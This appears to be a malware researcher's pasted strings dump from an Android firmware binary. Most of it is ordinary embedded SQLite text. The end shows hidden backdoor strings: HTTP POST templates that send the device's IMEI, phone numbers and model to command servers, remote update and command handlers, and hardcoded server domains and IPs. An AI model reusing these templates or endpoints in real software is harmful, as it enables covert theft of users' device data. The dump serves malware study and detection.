  1112. .rodata:0x04E787 locking protocol
  1113. .rodata:0x04E798 table contains no data
  1114. .rodata:0x04E7AF constraint failed
  1115. .rodata:0x04E7C1 datatype mismatch
  1116. .rodata:0x04E7D3 library routine called out of sequence
  1117. .rodata:0x04E7FA large file support is disabled
  1118. .rodata:0x04E819 authorization denied
  1119. .rodata:0x04E82E auxiliary database format error
  1120. .rodata:0x04E84E bind or column index out of range
  1121. .rodata:0x04E870 file is encrypted or is not a database
  1122. .rodata:0x04E897 addr
  1123. .rodata:0x04E89C opcode
  1124. .rodata:0x04E8A3 p1
  1125. .rodata:0x04E8A6 p2
  1126. .rodata:0x04E8A9 p3
  1127. .rodata:0x04E8AC p4
  1128. .rodata:0x04E8AF p5
  1129. .rodata:0x04E8B2 comment
  1130. .rodata:0x04E8BA selectid
  1131. .rodata:0x04E8C3 order
  1132. .rodata:0x04E8C9 detail
  1133. .rodata:0x04E8D0 RELEASE
  1134. .rodata:0x04E8D8 CTEXT
  1135. .rodata:0x04E8DE CNUM
  1136. .rodata:0x04E8E3 CINT
  1137. .rodata:0x04E8E8 CREAL
  1138. .rodata:0x04E8EE application_id
  1139. .rodata:0x04E8FD automatic_index
  1140. .rodata:0x04E90D busy_timeout
  1141. .rodata:0x04E91A cache_spill
  1142. .rodata:0x04E926 case_sensitive_like
  1143. .rodata:0x04E93A checkpoint_fullfsync
  1144. .rodata:0x04E94F collation_list
  1145. .rodata:0x04E95E compile_options
  1146. .rodata:0x04E96E count_changes
  1147. .rodata:0x04E97C database_list
  1148. .rodata:0x04E98A default_cache_size
  1149. .rodata:0x04E99D defer_foreign_keys
  1150. .rodata:0x04E9B0 empty_result_callbacks
  1151. .rodata:0x04E9C7 foreign_key_check
  1152. .rodata:0x04E9D9 foreign_key_list
  1153. .rodata:0x04E9EA foreign_keys
  1154. .rodata:0x04E9F7 freelist_count
  1155. .rodata:0x04EA06 full_column_names
  1156. .rodata:0x04EA18 fullfsync
  1157. .rodata:0x04EA22 ignore_check_constraints
  1158. .rodata:0x04EA3B incremental_vacuum
  1159. .rodata:0x04EA4E index_info
  1160. .rodata:0x04EA59 index_list
  1161. .rodata:0x04EA64 legacy_file_format
  1162. .rodata:0x04EA77 max_page_count
  1163. .rodata:0x04EA86 page_count
  1164. .rodata:0x04EA91 query_only
  1165. .rodata:0x04EA9C quick_check
  1166. .rodata:0x04EAA8 read_uncommitted
  1167. .rodata:0x04EAB9 recursive_triggers
  1168. .rodata:0x04EACC reverse_unordered_selects
  1169. .rodata:0x04EAE6 schema_version
  1170. .rodata:0x04EAF5 short_column_names
  1171. .rodata:0x04EB08 shrink_memory
  1172. .rodata:0x04EB16 stats
  1173. .rodata:0x04EB1C table_info
  1174. .rodata:0x04EB27 user_version
  1175. .rodata:0x04EB34 wal_checkpoint
  1176. .rodata:0x04EB43 writable_schema
  1177. .rodata:0x04EB53 delete
  1178. .rodata:0x04EB5A persist
  1179. .rodata:0x04EB62 off
  1180. .rodata:0x04EB66 truncate
  1181. .rodata:0x04EB6F wal
  1182. .rodata:0x04EB73 UTF8
  1183. .rodata:0x04EB78 UTF-8
  1184. .rodata:0x04EB7E UTF-16le
  1185. .rodata:0x04EB87 UTF-16be
  1186. .rodata:0x04EB90 UTF16le
  1187. .rodata:0x04EB98 UTF16be
  1188. .rodata:0x04EBA0 UTF-16
  1189. .rodata:0x04EBA7 UTF16
  1190. .rodata:0x04EBAD sqlite_attach
  1191. .rodata:0x04EBBB shared
  1192. .rodata:0x04EBC2 private
  1193. .rodata:0x04EBCA ro
  1194. .rodata:0x04EBCD rw
  1195. .rodata:0x04EBD0 rwc
  1196. .rodata:0x04EBD4 sqlite_detach
  1197. .rodata:0x04EBE2 tbl,idx,stat
  1198. .rodata:0x04EBEF sqlite_stat3
  1199. .rodata:0x04EBFC sqlite_stat4
  1200. .rodata:0x04EC09 stat_init
  1201. .rodata:0x04EC13 stat_push
  1202. .rodata:0x04EC1D stat_get
  1203. .rodata:0x04EC26 Function
  1204. .rodata:0x04EC2F Savepoint
  1205. .rodata:0x04EC39 AutoCommit
  1206. .rodata:0x04EC44 Transaction
  1207. .rodata:0x04EC50 SorterNext
  1208. .rodata:0x04EC5B PrevIfOpen
  1209. .rodata:0x04EC66 NextIfOpen
  1210. .rodata:0x04EC71 Prev
  1211. .rodata:0x04EC76 Next
  1212. .rodata:0x04EC7B AggStep
  1213. .rodata:0x04EC83 Checkpoint
  1214. .rodata:0x04EC8E JournalMode
  1215. .rodata:0x04EC9A Vacuum
  1216. .rodata:0x04ECA1 VFilter
  1217. .rodata:0x04ECA9 VUpdate
  1218. .rodata:0x04ECB1 Goto
  1219. .rodata:0x04ECB6 Gosub
  1220. .rodata:0x04ECBC Return
  1221. .rodata:0x04ECC3 Not
  1222. .rodata:0x04ECC7 InitCoroutine
  1223. .rodata:0x04ECD5 EndCoroutine
  1224. .rodata:0x04ECE2 Yield
  1225. .rodata:0x04ECE8 HaltIfNull
  1226. .rodata:0x04ECF3 Halt
  1227. .rodata:0x04ECF8 Integer
  1228. .rodata:0x04ED00 Int64
  1229. .rodata:0x04ED06 String
  1230. .rodata:0x04ED0D Null
  1231. .rodata:0x04ED12 SoftNull
  1232. .rodata:0x04ED1B Blob
  1233. .rodata:0x04ED20 Variable
  1234. .rodata:0x04ED29 Move
  1235. .rodata:0x04ED2E Copy
  1236. .rodata:0x04ED33 SCopy
  1237. .rodata:0x04ED39 ResultRow
  1238. .rodata:0x04ED43 CollSeq
  1239. .rodata:0x04ED4B AddImm
  1240. .rodata:0x04ED52 MustBeInt
  1241. .rodata:0x04ED5C RealAffinity
  1242. .rodata:0x04ED69 Permutation
  1243. .rodata:0x04ED75 Compare
  1244. .rodata:0x04ED7D Jump
  1245. .rodata:0x04ED82 Once
  1246. .rodata:0x04ED87 If
  1247. .rodata:0x04ED8A IfNot
  1248. .rodata:0x04ED90 Column
  1249. .rodata:0x04ED97 Affinity
  1250. .rodata:0x04EDA0 MakeRecord
  1251. .rodata:0x04EDAB Count
  1252. .rodata:0x04EDB1 ReadCookie
  1253. .rodata:0x04EDBC SetCookie
  1254. .rodata:0x04EDC6 OpenRead
  1255. .rodata:0x04EDCF OpenWrite
  1256. .rodata:0x04EDD9 OpenAutoindex
  1257. .rodata:0x04EDE7 OpenEphemeral
  1258. .rodata:0x04EDF5 SorterOpen
  1259. .rodata:0x04EE00 OpenPseudo
  1260. .rodata:0x04EE0B Close
  1261. .rodata:0x04EE11 SeekLT
  1262. .rodata:0x04EE18 SeekLE
  1263. .rodata:0x04EE1F SeekGE
  1264. .rodata:0x04EE26 SeekGT
  1265. .rodata:0x04EE2D Seek
  1266. .rodata:0x04EE32 NoConflict
  1267. .rodata:0x04EE3D NotFound
  1268. .rodata:0x04EE46 Found
  1269. .rodata:0x04EE4C NotExists
  1270. .rodata:0x04EE56 Sequence
  1271. .rodata:0x04EE5F NewRowid
  1272. .rodata:0x04EE68 Insert
  1273. .rodata:0x04EE6F Or
  1274. .rodata:0x04EE72 And
  1275. .rodata:0x04EE76 InsertInt
  1276. .rodata:0x04EE80 Delete
  1277. .rodata:0x04EE87 ResetCount
  1278. .rodata:0x04EE92 IsNull
  1279. .rodata:0x04EE99 NotNull
  1280. .rodata:0x04EEA1 Ne
  1281. .rodata:0x04EEA4 Eq
  1282. .rodata:0x04EEA7 Gt
  1283. .rodata:0x04EEAA Le
  1284. .rodata:0x04EEAD Lt
  1285. .rodata:0x04EEB0 Ge
  1286. .rodata:0x04EEB3 SorterCompare
  1287. .rodata:0x04EEC1 BitAnd
  1288. .rodata:0x04EEC8 BitOr
  1289. .rodata:0x04EECE ShiftLeft
  1290. .rodata:0x04EED8 ShiftRight
  1291. .rodata:0x04EEE3 Add
  1292. .rodata:0x04EEE7 Subtract
  1293. .rodata:0x04EEF0 Multiply
  1294. .rodata:0x04EEF9 Divide
  1295. .rodata:0x04EF00 Remainder
  1296. .rodata:0x04EF0A Concat
  1297. .rodata:0x04EF11 SorterData
  1298. .rodata:0x04EF1C BitNot
  1299. .rodata:0x04EF23 String8
  1300. .rodata:0x04EF2B RowKey
  1301. .rodata:0x04EF32 RowData
  1302. .rodata:0x04EF3A Rowid
  1303. .rodata:0x04EF40 NullRow
  1304. .rodata:0x04EF48 Last
  1305. .rodata:0x04EF4D SorterSort
  1306. .rodata:0x04EF58 Sort
  1307. .rodata:0x04EF5D Rewind
  1308. .rodata:0x04EF64 SorterInsert
  1309. .rodata:0x04EF71 IdxInsert
  1310. .rodata:0x04EF7B IdxDelete
  1311. .rodata:0x04EF85 IdxRowid
  1312. .rodata:0x04EF8E IdxLE
  1313. .rodata:0x04EF94 IdxGT
  1314. .rodata:0x04EF9A IdxLT
  1315. .rodata:0x04EFA0 IdxGE
  1316. .rodata:0x04EFA6 Destroy
  1317. .rodata:0x04EFAE Clear
  1318. .rodata:0x04EFB4 CreateIndex
  1319. .rodata:0x04EFC0 CreateTable
  1320. .rodata:0x04EFCC ParseSchema
  1321. .rodata:0x04EFD8 LoadAnalysis
  1322. .rodata:0x04EFE5 DropTable
  1323. .rodata:0x04EFEF DropIndex
  1324. .rodata:0x04EFF9 DropTrigger
  1325. .rodata:0x04F005 IntegrityCk
  1326. .rodata:0x04F011 RowSetAdd
  1327. .rodata:0x04F01B RowSetRead
  1328. .rodata:0x04F026 RowSetTest
  1329. .rodata:0x04F031 Program
  1330. .rodata:0x04F039 Param
  1331. .rodata:0x04F03F FkCounter
  1332. .rodata:0x04F049 FkIfZero
  1333. .rodata:0x04F052 MemMax
  1334. .rodata:0x04F059 IfPos
  1335. .rodata:0x04F05F Real
  1336. .rodata:0x04F064 IfNeg
  1337. .rodata:0x04F06A IfZero
  1338. .rodata:0x04F071 AggFinal
  1339. .rodata:0x04F07A IncrVacuum
  1340. .rodata:0x04F085 Expire
  1341. .rodata:0x04F08C TableLock
  1342. .rodata:0x04F096 VBegin
  1343. .rodata:0x04F09D VCreate
  1344. .rodata:0x04F0A5 VDestroy
  1345. .rodata:0x04F0AE ToText
  1346. .rodata:0x04F0B5 ToBlob
  1347. .rodata:0x04F0BC ToNumeric
  1348. .rodata:0x04F0C6 ToInt
  1349. .rodata:0x04F0CC ToReal
  1350. .rodata:0x04F0D3 VOpen
  1351. .rodata:0x04F0D9 VColumn
  1352. .rodata:0x04F0E1 VNext
  1353. .rodata:0x04F0E7 VRename
  1354. .rodata:0x04F0EF Pagecount
  1355. .rodata:0x04F0F9 MaxPgcnt
  1356. .rodata:0x04F102 Init
  1357. .rodata:0x04F107 Noop
  1358. .rodata:0x04F10C Explain
  1359. .rodata:0x04F114 NOT NULL
  1360. .rodata:0x04F11D UNIQUE
  1361. .rodata:0x04F124 CHECK
  1362. .rodata:0x04F12A FOREIGN KEY
  1363. .rodata:0x04F136 ltrim
  1364. .rodata:0x04F13C rtrim
  1365. .rodata:0x04F142 trim
  1366. .rodata:0x04F147 typeof
  1367. .rodata:0x04F14E length
  1368. .rodata:0x04F155 instr
  1369. .rodata:0x04F15B substr
  1370. .rodata:0x04F162 printf
  1371. .rodata:0x04F169 unicode
  1372. .rodata:0x04F171 char
  1373. .rodata:0x04F176 abs
  1374. .rodata:0x04F17A round
  1375. .rodata:0x04F180 upper
  1376. .rodata:0x04F186 lower
  1377. .rodata:0x04F18C coalesce
  1378. .rodata:0x04F195 hex
  1379. .rodata:0x04F199 ifnull
  1380. .rodata:0x04F1A0 unlikely
  1381. .rodata:0x04F1A9 likelihood
  1382. .rodata:0x04F1B4 random
  1383. .rodata:0x04F1BB randomblob
  1384. .rodata:0x04F1C6 nullif
  1385. .rodata:0x04F1CD sqlite_version
  1386. .rodata:0x04F1DC sqlite_source_id
  1387. .rodata:0x04F1ED sqlite_log
  1388. .rodata:0x04F1F8 sqlite_compileoption_used
  1389. .rodata:0x04F212 sqlite_compileoption_get
  1390. .rodata:0x04F22B quote
  1391. .rodata:0x04F231 last_insert_rowid
  1392. .rodata:0x04F243 changes
  1393. .rodata:0x04F24B total_changes
  1394. .rodata:0x04F259 replace
  1395. .rodata:0x04F261 zeroblob
  1396. .rodata:0x04F26A load_extension
  1397. .rodata:0x04F279 sum
  1398. .rodata:0x04F27D total
  1399. .rodata:0x04F283 avg
  1400. .rodata:0x04F287 count
  1401. .rodata:0x04F28D group_concat
  1402. .rodata:0x04F29A julianday
  1403. .rodata:0x04F2A4 date
  1404. .rodata:0x04F2A9 time
  1405. .rodata:0x04F2AE datetime
  1406. .rodata:0x04F2B7 strftime
  1407. .rodata:0x04F2C0 current_time
  1408. .rodata:0x04F2CD current_timestamp
  1409. .rodata:0x04F2DF current_date
  1410. .rodata:0x04F2EC sqlite_rename_table
  1411. .rodata:0x04F300 sqlite_rename_trigger
  1412. .rodata:0x04F316 sqlite_rename_parent
  1413. .rodata:0x04F32B sendDataToServer start !\n
  1414. .rodata:0x04F345 socket open error !\n
  1415. .rodata:0x04F35A IP=%s,PORT=%s\n
  1416. .rodata:0x04F369 socket connect error !\n
  1417. .rodata:0x04F381 strRequest===%s,len=%d\n
  1418. .rodata:0x04F399 socket write error !\n
  1419. .rodata:0x04F3AF strResponse=%s\n
  1420. .rodata:0x04F3BF HTTP/1.1 200 OK
  1421. .rodata:0x04F3CF request ok..%d---%d\n
  1422. .rodata:0x04F3E4 outStr=%s\n
  1423. .rodata:0x04F3EF sendDataToServer rtn=%d !\n
  1424. .rodata:0x04F40A sendDataToServer end !\n
  1425. .rodata:0x04F422 remote_request sendRegisteData start\n
  1426. .rodata:0x04F448 POST /pagt/agent?data={\"name\":\"c_regist\",\"details\":{\"uuid\":\"
  1427. .rodata:0x04F485 \",\"version\":\"
  1428. .rodata:0x04F493 \",\"model\":\"
  1429. .rodata:0x04F49F \",\"c_bin_version\":\"
  1430. .rodata:0x04F4B3 \",\"c_apk_version\":\"
  1431. .rodata:0x04F4C7 \",\"imei\":\"
  1432. .rodata:0x04F4D2 \",\"phoneNumber1\":\"
  1433. .rodata:0x04F4E5 \",\"phoneNumber2\":\"
  1434. .rodata:0x04F4F8 \",\"countryName\":\"
  1435. .rodata:0x04F50A \"}} HTTP/1.1\r\nHost:
  1436. .rodata:0x04F51F \r\nConnection: Close\r\n\r\n
  1437. .rodata:0x04F537 remote_request sendRegisteData rtn=%d\n
  1438. .rodata:0x04F55E remote_request sendRegisteData end\n
  1439. .rodata:0x04F582 remote_request getRemoteParams start\n
  1440. .rodata:0x04F5A8 POST /pagt/agent?data={\"name\":\"c_get_msg\",\"details\":{\"uuid\":\"
  1441. .rodata:0x04F5E6 remote_request getRemoteParams end\n
  1442. .rodata:0x04F60A remote_request syncStatus start\n
  1443. .rodata:0x04F62B POST /pagt/agent?data={\"name\":\"
  1444. .rodata:0x04F64B c_update_apk
  1445. .rodata:0x04F658 c_update_link
  1446. .rodata:0x04F666 c_update_text
  1447. .rodata:0x04F674 c_update_client
  1448. .rodata:0x04F684 c_update_config
  1449. .rodata:0x04F694 c_update_commands
  1450. .rodata:0x04F6A6 \",\"details\":{\"server_id\":\"
  1451. .rodata:0x04F6C1 \",\"status\":\"
  1452. .rodata:0x04F6CE \",\"date\":\"
  1453. .rodata:0x04F6D9 remote_request syncStatus end\n
  1454. .rodata:0x04F6F8 salesSystemRegist start !\n
  1455. .rodata:0x04F713 salesSystemRegist network ok !\n
  1456. .rodata:0x04F733 POST /RgkOTA/CheckRegister?hw=
  1457. .rodata:0x04F752 &hwv=
  1458. .rodata:0x04F758 &swv=
  1459. .rodata:0x04F75E &serialno=
  1460. .rodata:0x04F769 &beta=
  1461. .rodata:0x04F770 CHTTP/1.1\r\nHost:
  1462. .rodata:0x04F782 IP=%s,PORT=%d\n
  1463. .rodata:0x04F791 request ok..%s\n
  1464. .rodata:0x04F7A1 CHECK_MARKET_RESULT:1
  1465. .rodata:0x04F7B7 salesSystemRegist end result=%d !\n
  1466. .rodata:0x04F7DA true
  1467. .rodata:0x04F7DF false
  1468. .rodata:0x04F80D \\u%4.4x
  1469. .rodata:0x04F815 JSON: unsupported unicode value: 0x%d\n
  1470. .rodata:0x04F83C JSON: *state missing: %d\n
  1471. .rodata:0x04F856 JSON: state %d: defaulted at line %zd\n
  1472. .rodata:0x04F87D HTTP/1.1
  1473. .rodata:0x04F886 Content-Length:
  1474. .rodata:0x04F896 %s%c%s
  1475. .rodata:0x04F89D .%c%s
  1476. .rodata:0x04F8A3 wb+
  1477. .rodata:0x04F8A7 localHost=%s\n
  1478. .rodata:0x04F8B5 http://
  1479. .rodata:0x04F8BD https://
  1480. .rodata:0x04F8C6 http->host=%s,port=%d,r_path=%s,r_file=%s\n
  1481. .rodata:0x04F8F1 HEAD %s/%s HTTP/1.1\r\nAccept:*/*\r\nHost:%s:%d\r\nConnection: close\r\n\r\n
  1482. .rodata:0x04F934 GET %s/%s HTTP/1.1\r\nAccept:*/*\r\nHost:%s:%d\r\nConnection:Keep-alive\r\n\r\n
  1483. .rodata:0x04F97A /system/bin/build
  1484. .rodata:0x04F98E /system/build.prop
  1485. .rodata:0x04F9A1 File open error!\n
  1486. .rodata:0x04F9B3 ro.internal.version.rgk
  1487. .rodata:0x04F9CB ro.internal.version
  1488. .rodata:0x04F9DF ro.product.model
  1489. .rodata:0x04F9F0 ro.mediatek.platform
  1490. .rodata:0x04FA05 version=%s\n
  1491. .rodata:0x04FA11 model=%s\n
  1492. .rodata:0x04FA1B platform=%s\n
  1493. .rodata:0x04FA28 /proc/uptime
  1494. .rodata:0x04FA35 mobile_run_time=%s\n
  1495. .rodata:0x04FA49 open uptime error\n
  1496. .rodata:0x04FA5C read uptime error\n
  1497. .rodata:0x04FA6F uptime --buf = %s\n
  1498. .rodata:0x04FA82 /proc/net/tcp6
  1499. .rodata:0x04FA91 arr=%s!\n
  1500. .rodata:0x04FA9A rtn=%d!\n
  1501. .rodata:0x04FAA3 %4d
  1502. .rodata:0x04FAA7 %20
  1503. .rodata:0x04FAAB .000
  1504. .rodata:0x04FAB0 SELECT server_id,type,flag,update_time FROM t_push_infos WHERE is_remote_sync='0' order by server_id limit 1
  1505. .rodata:0x04FB23 delete from t_config where name='
  1506. .rodata:0x04FC23 114.80.68.22322
  1507. .rodata:0x04FC55 oyag.lhzbdvm.com
  1508. .rodata:0x04FC7D oyag.prugskh.net
  1509. .rodata:0x04FCA5 oyag.prugskh.com
  1510. .rodata:0x04FCCD SELECT value FROM t_config WHERE name='
  1511. .rodata:0x04FDCD update t_config set value = '
  1512. .rodata:0x04FECD insert into t_push_infos(server_id ,type,title,comments,url,package,icon,installType,flag,update_time,is_remote_sync) values('
  1513. .rodata:0x0502CD update t_push_infos set flag='
  1514. .rodata:0x0506CD update t_push_infos set is_remote_sync='
  1515. .rodata:0x050ACD SELECT flag FROM t_push_infos WHERE server_id='
  1516. .rodata:0x050BCD SELECT server_id,type,flag,update_time FROM t_push_infos WHERE is_remote_sync='0'
  1517. .rodata:0x050CCD -journal
  1518. .rodata:0x050CD7 -wal
  1519. .rodata:0x050CDD ><;=
  1520. .rodata:0x050D10 ifo
  1521. .rodata:0x050D2E qonp
  1522. .rodata:0x050D73 \n\n\n\n\n\n
  1523. .rodata:0x050D93 ******\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
  1524. .rodata:0x050DB2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  1525. .rodata:0x050E3D \b\b
  1526. .rodata:0x0519F6 CREATE TABLE sqlite_master(\ntype text,\nname text,\ntbl_name text,\nrootpage integer,\nsql text\n)
  1527. .rodata:0x051A5E %_
  1528. .rodata:0x051F66 CREATE TEMP TABLE sqlite_temp_master(\ntype text,\nname text,\ntbl_name text,\nrootpage integer,\nsql text\n)
  1529. .rodata:0x051FFC 3.8.4.3
  1530. .rodata:0x0522A4 REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\n\n\t\t\b\b\a\a\a
  1531. .rodata:0x05285A SQLite format 3
  1532. .rodata:0x05286A onoffalseyestruefull
  1533. .rodata:0x0528AA 0123456789ABCDEF
  1534. .rodata:0x0528BC \x1B\x1B\x1B\x1B
  1535. .rodata:0x0528C1 \x1B\x1B\x1B
  1536. .rodata:0x0528C5 \x1B\x1B\x1B\x1B
  1537. .rodata:0x0528D7 \x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B\x1B
  1538. .rodata:0x0529F5 naturaleftouterightfullinnercross
  1539. .rodata:0x052A7A abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
  1540. .rodata:0x0530E7 \a\b\t\n\v
  1541. .rodata:0x053100 C!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
  1542. .rodata:0x0531E0 0123456789ABCDEF0123456789abcdef
  1543. .rodata:0x053209 \x1BPQRSTUVWXYZ[\\]^_lmn\x1B
  1544. .rodata:0x053220 23PQRSzUVWXYZ[\\]^_
  1545. .rodata:0x053235 GHIJKLMNOPQRSzUVWXYZ[\\]^_
  1546. .rodata:0x0532BA 23cdefghi\x1B
  1547. .rodata:0x053805 \t\t\a\n\n
  1548. .rodata:0x05381D \t\a\a
  1549. .rodata:0x053848 \a\b\b
  1550. .rodata:0x0538B0 LL
  1551. .rodata:0x0538BE LLLLLLLLLL
  1552. .rodata:0x0538D3 \b\b
  1553. .rodata:0x05390F if>;=<
  1554. .rodata:0x053915 210.51.45.8911
  1555. .rodata:0x053947 ota.ragentek.com
  1556. .rodata:0x05396F ota1.ragentek.com
  1557. .rodata:0x053997 http://oyag.lhzbdvm.com:8082/padm/
  1558. .rodata:0x0539BF http://oyag.prugskh.net:8082/padm/
  1559. .rodata:0x0539E7 http://oyag.prugskh.com:8082/padm/
  1560.  
  1561. #MalwareMustDie - quick analysis by: @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement